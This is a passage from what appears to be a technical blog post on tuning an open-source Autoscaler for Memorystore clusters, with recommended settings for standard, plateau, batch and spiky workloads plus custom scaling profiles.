We refer to this fairly typical scenario as a “standard workload” whose time series shows:
Large utilization increase or decrease at certain points of the day
Small spikes over and under the threshold
A recommended base configuration for these types of workflow should include:
The LINEAR scalingMethod to cover large scale events
A small value for scaleOutCoolingMinutes — between 5 and 10 minutes — to minimize Autoscaler’s reaction time.
Plateau workloads
Another common scenario is applications with more consistent utilization during the day such as global apps, games, or chat applications. User interactions with these applications are more consistent, so the jumps in utilization are less pronounced than for a standard workload.
These scenarios create a “plateau workload” whose time series shows:
A pattern composed of various plateaus during the day
Some larger spikes within the same plateau
A recommended base configuration for these types of workflow should include:
The STEPWISE scalingMethod, with a stepSize sufficient to cover the largest utilization jump using only a few steps during a normal day, OR
The LINEAR scalingMethod, if there is likely to be a considerable increase or reduction in utilization at certain times, for example when breaking news is shared. Use this method together with a scaleInLimit to avoid reducing the capacity of your instance too quickly
Batch workloads
Customers often need increased capacity for their Memorystore clusters to handle batch processes or a sales event, where the timing is usually known in advance. These scenarios comprise a “batch workload” with the following properties:
A scheduled, well-known peak that requires additional compute capacity
A drop in utilization when the process or event is over
A recommended base configuration for these types of workloads should include two separate scheduled jobs:
One for the batch process or event, that includes an object in the configuration that uses the DIRECT scalingMethod, and a minSize value of the peak number of shards/nodes to cover the process or event
One for regular operations, that includes configuration with the same projectId and instanceId, but using the LINEAR or STEPWISE method. This job will take care of decreasing the capacity when the process or event is over
Be sure to choose an appropriate scaling schedule so that the two configurations don’t conflict. For both Cloud Run functions and GKE deployments, make sure the batch operation starts before the Autoscaler starts to scale the instance back in again. You can use the scaleInLimit parameter to slow the scale-in operation down if needed.
Spiky workloads
Depending on load, it can take around several minutes for Memorystore to update the cluster topology and fully utilize new capacity. Therefore, if your traffic is characterized by very spiky traffic or sudden-onset load patterns, the Autoscaler might not be able to provision capacity quickly enough to avoid latency, or efficiently enough to yield cost savings.
For these spiky workloads, a base configuration should:
Set a minSize that slightly over-provisions the usual instance workload
Use the LINEAR scalingMethod, in combination with a scaleInLimit to avoid further latency when the spike is over
Choose scaling thresholds large enough to smooth out some smaller spikes, while still being reactive to large ones
Advanced usage
As described above, the Autoscaler is preconfigured with scaling rules designed to optimize cluster size based on CPU and memory utilization. However, depending on your workload(s), you may find that you need to modify these rules to suit your utilization, performance and/or budget goals.
There are several ways to customize the rule sets that are used for scaling, in increasing order of effort required:
Choose to scale on only memory or only CPU metrics. This can help if you find your clusters flapping, i.e., alternating rapidly between sizes. You can do this by specifying a scalingProfile of either CPU or MEMORY to override the default CPU_AND_MEMORY in the Autoscaler configuration.
Use your own custom scaling rules by specifying a scalingProfile of CUSTOM, and supplying a custom rule set in the Autoscaler configuration as shown in the example here.
Create your own custom rule sets and make them available for everyone in your organization to use as part of a scaling profile. You can do this by customizing one of the existing scaling profiles to suit your needs. We recommend starting by looking at the existing scaling rules and profiles, and creating your own customizations.
Next steps
The OSS Autoscaler comes with a Terraform configuration to get you started, which can be integrated into your codebase for production deployments. We recommend starting with non-production environments, and progressing through to production when you are confident with the behavior of the Autoscaler alongside your application(s). Some more tips for production deployments are here in the documentation.
If there are additional features you would like to see in the Autoscaler — or would like to contribute to it yourself — please don’t hesitate to raise an issue via the GitHub issues page. We’re looking forward to hearing from you.